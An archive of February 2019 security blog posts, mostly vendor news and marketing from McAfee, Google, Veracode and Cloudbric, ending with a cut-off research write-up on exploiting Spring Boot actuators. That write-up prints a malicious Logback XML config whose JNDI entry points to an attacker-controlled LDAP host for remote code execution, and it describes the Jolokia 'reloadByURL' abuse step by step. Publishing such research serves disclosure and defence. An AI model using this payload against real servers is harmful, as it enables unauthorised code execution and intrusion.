Monthly Archives: February 2019

What MWC 2019 Shows Us About the Future of Connectivity

The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

Foldable Phones Are the Future

 MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it encloses like a book. Although neither of these devices are available at to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

Smart Home Technology Goes Mobile

 Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

Enhancing the Gaming Experience with 5G, VR, and AR

Not to be shown up, gaming developers also made a statement by using 5G technology to bring gamers into a more immersed gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Uniteapp, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each players’ phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real-time.

Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next-generation of wireless technology will allow them to participate in a highly immersive gaming experience.

Bringing 4G and 5G to the Automotive Industry

Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.

Securing Consumers On-the-Go

The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

And while consumers must take necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part of help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

Android Security Improvement update: Helping developers harden their apps, one thwarted vulnerability at a time

Posted by Patrick Mutchler and Meghan Kelly, Android Security & Privacy Team


[Cross-posted from the Android Developers Blog]

Helping Android app developers build secure apps, free of known vulnerabilities, means helping the overall ecosystem thrive. This is why we launched the Application Security Improvement Program five years ago, and why we're still so invested in its success today.

What the Android Security Improvement Program does

When an app is submitted to the Google Play store, we scan it to determine if a variety of vulnerabilities are present. If we find something concerning, we flag it to the developer and then help them to remedy the situation.

Think of it like a routine physical. If there are no problems, the app runs through our normal tests and continues on the process to being published in the Play Store. If there is a problem, however, we provide a diagnosis and next steps to get back to healthy form.

Over its lifetime, the program has helped more than 300,000 developers to fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users with the same security issues present, which we consider a win.

What vulnerabilities are covered

The App Security Improvement program covers a broad range of security issues in Android apps. These can be as specific as security issues in certain versions of popular libraries (ex: CVE-2015-5256) and as broad as unsafe TLS/SSL certificate validation.

We are continuously improving this program's capabilities by improving the existing checks and launching checks for more classes of security vulnerability. In 2018, we deployed warnings for six additional security vulnerability classes including:

  1. SQL Injection
  2. File-based Cross-Site Scripting
  3. Cross-App Scripting
  4. Leaked Third-Party Credentials
  5. Scheme Hijacking
  6. JavaScript Interface Injection

Ensuring that we're continuing to evolve the program as new exploits emerge is a top priority for us. We are continuing to work on this throughout 2019.

Keeping Android users safe is important to Google. We know that app security is often tricky and that developers can make mistakes. We hope to see this program grow in the years to come, helping developers worldwide build apps users can truly trust.

Mobile Threat Report Commentary: Mobile Malware is Not Going Away

Employees use their mobile devices to be proactive and stay connected in both their personal and work lives. The movement to the cloud has allowed employees to check email, download documents, and share information that may contain sensitive information, even when they’re not on an enterprise network. Businesses must protect their enterprise environments and combat threats that target their employees as average consumers.

McAfee research shows that every mobile-enabled device is subject to some type of malicious exploit. In 2018, McAfee researchers discovered mobile malware named TimpDoor, which turned Android devices into hidden proxies. But in 2019, businesses should be prepared for malware that goes beyond mobile devices too.

Detections of backdoors, cryptomining, fake apps, and banking Trojans all increased substantially in the second half of 2018 and attacks on other connected household devices gained momentum as well. While hidden apps like Adware remain by far the most common form of mobile malware, others are growing and learning how to infect other devices.

Mobile devices are becoming a hub for ransomware and malware developers. One common thread through much of the mobile attack landscape is the quest for illicit profits. Criminals are looking for ways to maximize their income and shift tactics in response to changes in the market.

“75% rise in banking Trojans, enabling cybercriminals to steal financial credentials from mobile devices”

“550% increase in mobile malware realized by the end of 2018”

Weak to non-existent security controls from manufacturers and a lack of simple evasion techniques, such as changing the default username and password, make connected devices in the home and workplace targets for cybercriminals.

Although mobile devices have become key enablers for business productivity and connectivity, they’re still the greatest risk to enterprises today. This changes how enterprises need to secure the mobile devices that connect to their environment. Enterprises must invest in endpoint security solutions to protect themselves from the evolving threat landscape. Mobile is one of the fastest growing endpoints and needs to be protected just as much as laptops and desktop computers.

McAfee has addressed the growing need by introducing the MVISION portfolio family, which provides IT administrators with comprehension and control through one single management console. McAfee MVISION Mobile provides on-device detection, local (end user) threat remediation, visual mapping of nearby dangerous networks, customizable on-device user notifications, and advanced threat detection. This provides the enterprise-class threat defense that businesses today need to be secure.

Read the McAfee Mobile Threat Report to learn more about protecting your employees’ mobile devices from malware and other cyberthreats.

The post Mobile Threat Report Commentary: Mobile Malware is Not Going Away appeared first on McAfee Blogs.

How Veracode Scans Docker Containers for Open Source Vulnerabilities

Veracode Container Security Scanning

Veracode Software Composition Analysis now also scans Docker containers and images to find vulnerabilities associated with open source libraries as dependencies of the base OS image and globally installed packages. If you’re interested in understanding how containers work, the different components that make up your container ecosystem, and how that differs from virtualization, we recommend this great overview by Docker.

Do containers introduce new risks?

Containers can introduce new risks to your application due to the installation of a base OS image that you may not have used without the container, but they can also give you greater access and knowledge earlier in the development process. The image itself will often depend on numerous open source libraries that can introduce new vulnerabilities to your application. In addition, containers allow you to install packages at the global level, which previously may not have been accessible to vulnerability scans. It’s also not uncommon for developers to build applications in different environments than what is in production, meaning any vulnerability scans in development may not mirror what is in production. By containerizing applications, developers are able to build in the same environment as the final production platform, allowing them to conduct vulnerability scans on a production-ready image.

Simply using containers isn’t the security risk – it’s not knowing which open source libraries are installed and the vulnerabilities they may present.

How does Veracode secure containers?

Securing your container infrastructure is a huge undertaking that isn’t always clearly defined. Every layer of the container infrastructure can introduce risks, including the hardware, host OS, kernel, Docker engine, registry, base OS image, globally installed packages, and the application. Look to your existing set of vendors and solutions to address each one of them in the same way that you’re addressing OS vulnerabilities on the rest of the network.

As an application security company, Veracode is focused on the application, the base OS image, and the globally installed packages.

Securing containers from open source vulnerabilities isn’t all that different from looking at vulnerabilities in open source libraries in your code. You need to be able to scan your container the moment it’s introduced, with all of its globally installed packages. This enables your development team to decide whether they want to proceed forward with the vulnerabilities present, introduce ways to mitigate the issues, update to a more secure version of the libraries being used, or explore alternative base images and libraries that are more secure.

Divide and conquer: vulnerabilities in application code vs. base OS image

To limit complexity, and to avoid waiting for all applications to be “Dockerized,” Veracode recommends that you divide and conquer the security of the application itself and the security of the container and its dependencies:

  1. Scan your code before you package it up in a container – fix all of the third-party vulnerabilities, and the flaws found in your first-party code.
  2. Once your application/code is in a state that is acceptable for production, containerize the application in your pipeline, and then run an open source security scan against the container itself.

Veracode Software Composition Analysis finds vulnerabilities in the base OS image and runtime dependencies

Veracode Software Composition Analysis now looks for vulnerabilities associated with open source libraries as dependencies of the base OS image (CentOS/RHEL) and any packages globally installed with the YUM package manager in a Docker container.

Containers are scanned automatically via an agent in the developer’s CI system, or manually in a developer’s CLI. You can scan your application prior to the containerization and the container itself separately. This provides a clear inventory of all of the dependencies and associated vulnerabilities before pushing it to production.

Finally, Veracode Software Composition Analysis keeps a history of what’s in the container and alerts you to new vulnerabilities, removing the requirement of rescanning the container unless you change its dependencies.

To learn more about open source libraries, and direct vs. indirect dependencies, read the Understanding Your Open Source Risk ebook.

The 80’s called….they want their on-premises solution back!

Are you still breakdancing? Storing data on your floppy disk? Performing your searches through the card catalog? Assuming the answer is no, then why are you still using an on-premises application security solution?

In all seriousness, take a look at the benefits, and cost savings, you would see with a cloud-based AppSec solution:

Start scanning immediately: No need to install servers and tools, no need to hire consultants or security specialists to get up and running. On-premises solutions require significant upfront implementation and equipment costs. In addition, on-premises solutions typically require specialized experts to install and run. The security experts who can install, configure, and maintain these tools, as well as respond to the information they return, are expensive and in short supply.

Easily accommodate large and distributed teams: In today’s environment, teams are rarely in one location. With cloud solutions, disparate teams can work seamlessly together.

Cumbersome to scale: When an on-premises application security program needs to be scaled, enterprises frequently need to track down more of these hard-to-find security specialists, in addition to installing more servers.

Continuously learning and improving: Unlike an on-premises AppSec solution, a cloud-based solution is continuously gathering more information, learning, and improving. With this feature, it’s less likely that developers will get bogged down with false positives because the platform is continuously learning to adapt to evolving threats.

Mobile access: Mobile access is available with a cloud solution, but not always with an on-premises solution.

As progressive organizations seek the best possible solution for addressing the challenge of application security, they’re looking for speed, scale, and simplicity. These are the exact limitations of on-premises software. So why are some companies still holding on to a thing of the past?

In conclusion, let’s keep the 80’s where they belong, back in the 80’s (except for some of the music, some of the music is worth keeping).

Need more convincing?  Check out some of the related content below.

Related Content:

The Ultimate Guide to Getting Started With Application Security

Infosheet: Spotting Hidden Costs: Veracode vs. On-Premises Tools

Guide: Cloud vs. On-Premises Guide

McAfee Partners With Telefónica To Help Secure Consumers Worldwide

These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.

This partnership first began back in February of last year, when ElevenPaths, Telefónica Cyber Security Unit, and McAfee announced we’re working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from. Fast forward to present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.

Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.

ElevenPaths and Mcafee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.

To learn more about consumer security and our approach to it, be sure to follow us at @ElevenPaths and @McAfee.

The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.

In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware

This time last year, we said that 2018 would be the year of mobile malware.

Today at MWC, we’re calling 2019 the year of everywhere malware.

In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was a relatively hassle-free way of making money. But the bottom dropped out of the crypto-currency market over the course of 2018. Now it’s not as lucrative, so we witness more aggressive forms of ransomware that make payment more likely.

Our latest Mobile Threat Report has revealed a huge increase in backdoors, fake apps and banking Trojans. Hidden apps are being exploited as quickly as app stores can take them down and adversaries are adapting and developing new threats. The number of attacks on other connected things is growing too – your voice assistant might even be letting criminals into your home. And smartphones, of course, remain a prime target.

In particular, the use of banking Trojans to steal financial credentials has exploded. Their popularity is growing so fast that we saw the number of incidents double between June and September last year. They then spiked by a further 75 percent in December. Android users in particular are being targeted, as malware authors find new ways of bypassing Google’s security. Unfortunately for consumers, these Trojans represent a solid source of income for cybercriminals so, for the foreseeable future at least, we can expect them to continue to evolve and become more sophisticated.

A worrying new trend sees attacks extending beyond mobile apps and operating systems and into our homes. Smart home tech is becoming integral to our domestic lifestyle – there are already over 25 million voice assistants such as Google Home and Alexa in our homes, and this is expected to grow to as many as 275 million within the next five years. Add to this a growing number of connected thermostats, locks and doorbells, and this represents a huge – and hugely attractive – attack vector for cybercriminals. The quirks and vulnerabilities of these devices, coupled with weak to non-existent security controls could provide unfettered access to the rest of your home network.

At the heart of all of this, of course, lies the smartphone. The control hub and gateway to the voice assistants and smart devices we engage with on a day-to-day basis, these devices track where we are, what we’re doing, and often hold important personal information. Access to our smartphones is clearly worth its weight in gold to criminals. After all, from here they steal our bank details and even make their way into our homes. And with new malware families especially designed to trick smartphone users into giving them access, that’s just what they’re trying to do.

The mobile ecosystem is continually changing. Operators and developers can get wise to tactics used by criminals but criminals will never give up in their pursuit for profit. If one door closes on them, they’ll just open another one. They’ll change their tactics and broaden their efforts to target more aspects of our increasingly ubiquitous mobile use.

That’s why the entire tech industry, from the manufacturers of smart device manufacturers and mobile devices to developers and app store owners, must work more closely. Only then will we be able to tackle this insidious threat and protect consumers at every point of their increasingly digital life.

To find out more, see our latest Mobile Threat Report here.

The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.

Connect with NICE at RSA Conference 2019

The NICE Program Office will be participating in the RSA Conference next week in San Francisco, California. See below for ways you can connect with us. We hope to see you there!

Google Play Protect in 2018: New updates to keep Android users secure


Posted by Rahul Mishra and Tom Watkins, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

In 2018, Google Play Protect made Android devices running Google Play some of the most secure smartphones available, scanning over 50 billion apps everyday for harmful behaviour.
Android devices can genuinely improve people's lives through our accessibility features, Google Assistant, digital wellbeing, Family Link, and more — but we can only do this if they are safe and secure enough to earn users' long term trust. This is Google Play Protect's charter and we're encouraged by this past year's advancements.

Google Play Protect, a refresher

Google Play Protect is the technology we use to ensure that any device shipping with the Google Play Store is secured against potentially harmful applications (PHA). It is made up of a giant backend scanning engine to aid our analysts in sourcing and vetting applications made available on the Play Store, and built-in protection that scans apps on users' devices, immobilizing PHA and warning users.
This technology protects over 2 billion devices in the Android ecosystem every day.

What's new

On by default
We strongly believe that security should be a built-in feature of every device, not something a user needs to find and enable. When security features function at their best, most users do not need to be aware of them. To this end, we are pleased to announce that Google Play Protect is now enabled by default to secure all new devices, right out of the box. The user is notified that Google Play Protect is running, and has the option to turn it off whenever desired.

New and rare apps
Android is deployed in many diverse ways across many different users. We know that the ecosystem would not be as powerful and vibrant as it is today without an equally diverse array of apps to choose from. But installing new apps, especially from unknown sources, can carry risk.
Last year we launched a new feature that notifies users when they are installing new or rare apps that are rarely installed in the ecosystem. In these scenarios, the feature shows a warning, giving users pause to consider whether they want to trust this app, and advising them to take additional care and check the source of installation. Once Google has fully analyzed the app and determined that it is not harmful, the notification will no longer display. In 2018, this warning showed around 100,000 times per day
Context is everything: warning users on launch
It's easy to misunderstand alerts when presented out of context. We're trained to click through notifications without reading them and get back to what we were doing as quickly as possible. We know that providing timely and context-sensitive alerts to users is critical for them to be of value. We recently enabled a security feature first introduced in Android Oreo which warns users when they are about to launch a potentially harmful app on their device.

This new warning dialog provides in-context information about which app the user is about to launch, why we think it may be harmful and what might happen if they open the app. We also provide clear guidance on what to do next. These in-context dialogs ensure users are protected even if they accidentally missed an alert.
Auto-disabling apps
Google Play Protect has long been able to disable the most harmful categories of apps on users devices automatically, providing robust protection where we believe harm will be done.
In 2018, we extended this coverage to apps installed from Play that were later found to have violated Google Play's policies, e.g. on privacy, deceptive behavior or content. These apps have been suspended and removed from the Google Play Store.
This does not remove the app from user device, but it does notify the user and prevents them from opening the app accidentally. The notification gives the option to remove the app entirely.
Keeping the Android ecosystem secure is no easy task, but we firmly believe that Google Play Protect is an important security layer that's used to protect users devices and their data while maintaining the freedom, diversity and openness that makes Android, well, Android.
Acknowledgements: This post leveraged contributions from Meghan Kelly and William Luh.

Request for Comments: PCI SPoC MSR Annex

 

From 26 Feb to 26 March, PCI SSC stakeholders can participate in a Request for Comments (RFC) on the draft PCI SPoC Magnetic Stripe Reader (MSR) Annex. RFC periods are avenues for PCI SSC stakeholders to provide feedback on existing and new PCI Security Standards. This feedback plays a critical role in the ongoing maintenance and development of these resources for the payment card industry.

How To: Become An Official Cloudbric Ambassador

Cloudbric is pleased to announce our Official Cloudbric Ambassador Program!

Maybe you’re new to the community or perhaps you were unable to participate in our airdrops and bounty programs previously — whatever the case may be, now is your chance to earn rewards with us.

Participating in the Official Cloudbric Ambassador Program is easy:

Cloudbric Ambassador infographic
How to Participate 

✔ Step 1: Follow us on social media and get verified by our team

Subscribe to Cloudbric’s main social media channels (i.e. Reddit, Telegram Community, Facebook, LinkedIn, and Twitter). Let us know your handle in each of our community channels for verification here. Individuals can check their approval status here.

By joining the program, you are agreeing to subscribe to our newsletter. Opting out may disqualify you from the program. Please make sure your email is valid and that you have not accidentally marked incoming emails from or ico@cloudbric.com or marketing@cloudbric.com as spam.

✔ Step 2: Participate in discussions

This is the most important step in getting rewards! Please provide insightful questions, comments, help for other users, etc. that lead to additional sharing/discussion (comments or posts in our communities does not have to be directly Cloudbric related, but must be relevant within the cybersecurity or blockchain space). Submit our social activities through a separate submissions form.

✔ Step 3:  Receive rewards

If your posts or comments receive additional shares or follow up comments, you are eligible to receive prizes and giveaways including CLB airdrops, Starbucks/Amazon gift cards, free WAF servicing, and more.

Referrals – You can also invite friends to join our channels. They MUST satisfy the same requirements (Steps 1-3) for you to potentially receive double the rewards (2x CLB airdrops, larger gift card giveaways, longer WAF servicing, etc.). Referrals can be added through the same Google Form.

Guidelines & Rules

To avoid disqualification from the program, please read through the guidelines and rules carefully.

Users who have submitted their social media handles and have been verified/approved can begin their duties as an Official Cloudbric Ambassador.

Engagements will be treated equally across the different social media platforms (i.e. Reddit, Telegram Community, Facebook, LinkedIn, and Twitter). So, if you don’t have a Twitter account for example, you’re not at a disadvantage!

We reserve the right to remove anyone from the campaign at any time from suspected dishonesty or spamming.

Anyone discussing issues regarding race, gender, politics, or other irrelevant topics can be permanently banned from the campaign.

Guidelines are subject to change at any time.

Submissions:

Users are not limited to the number of engagements per week, however, users will be asked to submit the URL links of their social activities. You can submit up to five social activities per week. If you submit more than five, only five will be reviewed by our team. If you’re submitting for Telegram, please submit your Telegram username in lieu of a an URL. 

Posts should avoid using generic tones (e.g. “well done,” “nice work,” “great project,” “to the moon” etc.) or copy and pasted material from our whitepaper, website, or other resources. Only engaging content will be reviewed and only legitimate comments/questions/referrals will be legible for rewards.

If you’ve made a follow-up comment, post the URL of the original post.

Reviews:

To give participants ample time to receive follow up discussion/comments to their posts, reviews will occur after two weeks of first posting.

Distribution:

Users will receive their awards twice bi-quarterly basis, depending on the number of overall participants.

Grading System & Awards

Winners may be eligible to receive the following awards: CLB, Gift Cards (Amazon/Starbucks), WAF Servicing. Awards are subject to change and we may choose to add higher stake awards.

Social activities, or referrals will be assigned a point value:

Type A: Original posts = 1 pt

    • Relevant, organic posts/questions

Type B: Engaged posts = 3 pts

    • Shares, followup comments on Type A posts

Referrals = 10 pts

Once the required points are reached, participants can choose awards from the following list:

80 8,000 CLB
80 $25 gift card
80 3 months free of Cloudbric service, up to 100GB
160 16,000 CLB
160 $50 gift card
160 6 months free of Cloudbric service, up to 100GB
FAQ

1) How long will it take for my social media handles to get approved by the Cloudbric team?

Please allow for up to 3 business days. If you don’t hear back within 3 business days please email us at ico@cloudbric.com.

2) How do I submit proof of my social activities?

Follow this Google Form and follow the instructions. 

3) Can I choose which prize to receive?

Yes, as long as the required points are met. We will ask participants to choose a reward of their choice.

4) How do you redeem prizes?

As specified in the guidelines, users will receive their awards twice bi-quarterly basis, depending on the number of overall participants. Cloudbric will request further information (for example, recipient email address for gift cards, ETH address for receiving CLB) if needed.

5) Is there a limit on the number of referrals?

There is not limit at the moment but rules and other are guidelines are subject to change. Please note that simply adding referrals does not guarantee you the specified points. Referrals must fulfill Steps 1-3 and therefore must participate in discussions to be eligible for rewards.

6) Until when will the Cloudbric Ambassador Program run? 

The Cloudbric Ambassador Program will run until the end of year!

The post How To: Become An Official Cloudbric Ambassador appeared first on Cloudbric.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down.  This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through apps stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

DorkMe – Google Dorks Tool Search For Vulnrabilities

DorkMe – Google Dorks Tool Google Dorks Tool DorkMe is a tool designed with the purpose of making easier the searching of vulnerabilities with Google Dorks, such as SQL Injection vulnerabilities. Dependencies   pip install -r requirements.txt It is highly recommended to add more dorks for an effective search, keep reading to see how Usage […]

The post DorkMe – Google Dorks Tool Search For Vulnrabilities appeared first on HackingVision.

Exploiting Spring Boot Actuators

This post was updated May 1, 2019

The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.

When a Spring Boot application is running, it automatically registers several endpoints (such as '/health', '/trace', '/beans', '/env' etc) into the routing process. For Spring Boot 1 - 1.4, they are accessible without authentication, causing significant problems with security. Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.

The following Actuator endpoints could potentially have security implications leading to possible vulnerabilities:

  • /dump - displays a dump of threads (including a stack trace)
  • /trace - displays the last several HTTP messages (which could include session identifiers)
  • /logfile - outputs the contents of the log file
  • /shutdown - shuts the application down
  • /mappings - shows all of the MVC controller mappings
  • /env - provides access to the configuration environment
  • /restart - restarts the application

For Spring 1x, they are registered under the root URL, and in 2x they moved to the "/actuator/" base path.

Exploitation:

Most of the actuators support only GET requests and simply reveal sensitive configuration data, but several of them are particularly interesting for shell hunters:

1. Remote Code Execution via '/jolokia'

If the Jolokia Library is in the target application classpath, it is automatically exposed by Spring Boot under the '/jolokia' actuator endpoint. Jolokia allows HTTP access to all registered MBeans and is designed to perform the same operations you can perform with JMX. It is possible to list all available MBeans actions using the URL:

http://127.0.0.1:8090/jolokia/list

Again, most of the MBeans actions just reveal some system data, but one is particularly interesting:

The 'reloadByURL' action, provided by the Logback library, allows us to reload the logging config from an external URL. It could be triggered just by navigating to:

So, why should we care about logging config? Mainly because of two things:

  1. Config has an XML format, and of course, Logback parses it with External Entities enabled, hence it is vulnerable to blind XXE.
  2. The Logback config has the feature 'Obtaining variables from JNDI'. In the XML file, we can include a tag like '<insertFromJNDI env-entry-name="java:comp/env/appName" as="appName" />' and the name attribute will be passed to the DirContext.lookup() method. If we can supply an arbitrary name into the .lookup() function, we don't even need XXE or HeapDump because it gives us a full Remote Code Execution.

How it works:

1. An attacker requests the aforementioned URL to execute the 'reloadByURL' function, provided by the 'qos.logback.classic.jmx.JMXConfigurator' class.

2. The 'reloadByURL' function downloads a new config from http://artsploit.com/logback.xml and parses it as a Logback config. This malicious config should have the following content:

<configuration>
  <insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" />
</configuration>

3. When this file is parsed on the vulnerable server, it creates a connection to the attacker-controlled LDAP server specified in the “env-entry-name” parameter value, which leads to JNDI resolution. The malicious LDAP server may return an object with 'Reference' type to trigger an execution of the supplied bytecode on the target application. JNDI attacks are well explained in this MicroFocus research paper. The new JNDI exploitation technique (described previously in our blog) also works here, as Tomcat is the default application server in the Spring Boot Framework.

2. Config modification via '/env'

If Spring Cloud Libraries are in the classpath, the '/env' endpoint allows you to modify the Spring environmental properties. All beans annotated as '@ConfigurationProperties' may be modified and rebinded. Many, but not all, properties we can control are listed on the '/configprops' actuator endpoint. Actually, there are tons of them, but it is absolutely not clear what we need to modify to achieve something. After spending a couple of days playing with them we found this:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
